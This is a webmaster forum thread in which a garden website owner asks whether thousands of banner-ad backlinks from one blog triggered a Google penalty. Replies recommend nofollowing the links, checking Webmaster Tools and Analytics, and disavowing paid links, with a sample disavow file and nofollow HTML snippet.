I have 4,012 links from one blog - will Google penalise me?
-
My website (http://www.gardenbeet.com) has 4,012 links from http://cocomale.com/blog/ to my home page - a banner advert on the blog links to my site.
I also have 3,776 links from another website to 6 pages of my website,
1,832 from Pinterest to 183 pages,
and so on.
Overall, there are 627 domains linking to my website.
An SEO company has advised me that I was penalised at some point between May and July 2012 due to a large number of links coming from one or two domains.
Is that true? Should I ask the blog owner to remove my link?
-
Sorry for the late reply!
Short answer: yes. That looks like a gradual drop that could be caused by a lack of new activity and/or engagement with your site. I'd be surprised if it were link-based.
-
Hi everyone, thanks for your feedback.
I will get those links nofollowed.
There are no manual penalties.
I have no paid adverts linking to my site.
I believe the drop in traffic is due to my reduction in online activity after June 2012 rather than a Google penalty. Would the graph that I have attached look more dramatic if a penalty had been applied?
-
In addition to what Bill said (excellent advice), I'd also try to:
- Get those links nofollowed, or ask that they be removed.
- Check for manual penalties.
- Disavow any domain with paid ads linking to your site (a sample disavow file follows this list).
- File a reconsideration request if necessary.
After that, you should be in a good position to re-evaluate.
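For reference, a disavow file is just a plain UTF-8 text file uploaded through Google's Disavow Links tool, with one URL or domain per line and # marking comments. This is a minimal sketch with placeholder domains only - it is not a suggestion to disavow any site mentioned in this thread:

# Disavow file - lines starting with # are comments
# Disavow a single page:
http://spam.example.com/paid-links.html
# Disavow an entire domain:
domain:spammy-directory.example.com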
-
Bill covered all the important points there, Felicity.
-Andy
-
My suggestion is to ask the owner to make them nofollow. For a banner ad, that is Google's recommendation.
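As a minimal sketch, the nofollowed banner link in the blog's HTML would look something like this (the image path and alt text are placeholders):

<!-- Banner advert link marked rel="nofollow" so it passes no PageRank -->
<a href="http://www.gardenbeet.com/" rel="nofollow">
  <img src="/images/gardenbeet-banner.jpg" alt="Garden Beet">
</a>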
As for seeing whether you were penalised: use Webmaster Tools to check for any manual penalties. If there are none, go back to Google Analytics, filter for organic search, and look at the traffic for the last three years if you have the data. If there was an algorithmic penalty, you should see a drop-off in traffic. If there is a drop, I would also check whether other changes were made to the site during that period, to rule out on-page issues.